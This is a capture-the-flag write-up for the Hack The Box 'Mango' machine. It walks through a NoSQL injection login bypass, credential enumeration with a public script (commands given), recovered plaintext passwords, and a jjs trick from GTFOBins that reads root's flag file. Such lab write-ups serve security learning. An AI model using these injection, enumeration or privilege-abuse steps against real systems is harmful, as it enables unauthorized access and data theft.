ur - mango - 10.10.10.162

using nmap we see several web ports open

Reading the output of sslscan on the https port we see 


![17e6b2f0e96a98259f6d3cc3421b1dd1.png](../../_resources/552bdee9ced24f158fa94314ebfafebf.png)


on port 80 we get a message of no permission. when accessing both the normal mango.htb
However on https we get.



![4ff7e0a7d829df87080f5910707a5b77.png](../../_resources/d7286e48eea14be2a4da54dab850c1ef.png)



As for the stageing order we get.


![7ab4290a19891753605fe6deea0379d6.png](../../_resources/8b7b1798ea2c4dcda288db72aefc19e1.png)


https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
using the auth bypass in the payload all the things first make attempt the login


![a0e1a9f22a928486c00af74d9a2021e8.png](:/d7215707431d4b7cb7e34f1a7e861ffd)


replace the username and password to that of the injection


![10b42677f6949156c869b85d71921340.png](../../_resources/395173f554f743938f327bb7d4f5d560.png)


![45b28a4fafba030ce2a8da6dfe057399.png](../../_resources/7202f73188774c8c95b3d2a90d5cf25d.png)




we get logged in

Ok however we need to get users and passwords. as the site is not set up
looking at the invalid login we see 


![509e3598a27297fa294650a698487b20.png](../../_resources/0c7caebd288f4a1b9fcfe1fef4897a0d.png)

.
but using the auth bypass of 


![924a12595af6d46b30d5ce7348cd30c7.png](../../_resources/b74ffa0b514242298cf28b633427e110.png)


we get 


![b741741493fcc09349c5d991664f8b86.png](../../_resources/c3b41d0259394ebca91d7d097b0ba3cd.png)


with this we can get the the user as we can start doing a regex to build up the usernames


![225a57493e823c9a0c9c3588b2091668.png](../../_resources/98b632b6635749419c6f73e4fb893694.png)


![f869950a20eed22e1ae745c3690311e9.png](../../_resources/ef17aadc3d044ca7a548f6101cbe026f.png)




so we can see ther is a user who's username begins with the letter a
This can be automated with 
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
and the command:
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username
this gives the following output


![546be4db33e0a3585214bfbbe0b94b8a.png](../../_resources/612e9316f7e748ddbb2e609c33041986.png)


Following this we can pull usernames with 

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password


![ae64a30ebd77390a3d98ef0d9c0ef104.png](../../_resources/6ddd76e6e0734ac39404bf6b7cce9528.png)


after testing the creds
mango:h3mXK8RhU~f{]f5H 
admin:t9KcS3>!0B#2

attempting to ssh in 


![0aea13a6c9e7020d93045ecde07f2c4a.png](../../_resources/520e6633067a41ec8c09e32a4ddc9e1a.png)


Looing in the home directory we see that tehre is an admin user


![62f7f544fcfbe36c2b8d19acc0671437.png](../../_resources/f1e9c4a3bb944d4c9eccb2d128c65e34.png)


attempting to su as the user we gain its privs


![7205ecbd1d63f0fbd577921ee76ec6d8.png](../../_resources/755edf35ce7842c999960fb2755f788e.png)



![ced492175fabab3d38365c9f1a15ad19.png](../../_resources/cd4733ee074742a29d15880a14b60b4a.png)



checking sudo perms we get 



![928070b5a85baa0a3c1cded35d8cdc7f.png](../../_resources/695a97dba658453695a66c02486707ec.png)


The output of linenum shows the following


![6e84115e963e9623f57bcaa115ad2300.png](../../_resources/c7543c595de649298c41dcc8bf69c2c1.png)



looing atht e oracle docs


![19a0db132dcac5106e27748fd07ed4a0.png](../../_resources/7015fe9c954a4cffa42c3411d1af625b.png)


https://gtfobins.github.io/gtfobins/jjs/

I tried to get a shell as root and filed but did manage to read the file.
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs



![2bfb57723dfbd467bcc1834927629733.png](../../_resources/712984352db44be8b449df9015fe1315.png)

